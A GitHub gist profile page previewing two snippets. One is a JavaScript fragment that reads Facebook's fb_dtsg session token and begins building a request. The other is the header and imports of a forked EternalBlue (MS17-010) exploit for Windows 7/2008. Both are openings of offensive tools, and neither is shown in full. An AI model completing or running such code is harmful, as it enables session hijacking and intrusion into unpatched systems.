Skip to content

Instantly share code, notes, and snippets.

View kiralab's full-sized avatar
☀️
sunshine...

KIRA kiralab

☀️
sunshine...
  • whoami
  • In Your Heart ❤️
View GitHub Profile
/*
** Author: @MonokaiJs[FB: @MonokaiJsp]
** Home: https://omfg.vn
** ISC Licensed
*/
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var http = new XMLHttpRequest;
var data = new FormData();
data.append('fb_dtsg', fb_dtsg);
data.append('app_id', '165907476854626');
@kiralab
kiralab / eternalblue7_exploit.py
Created February 24, 2018 20:12 — forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)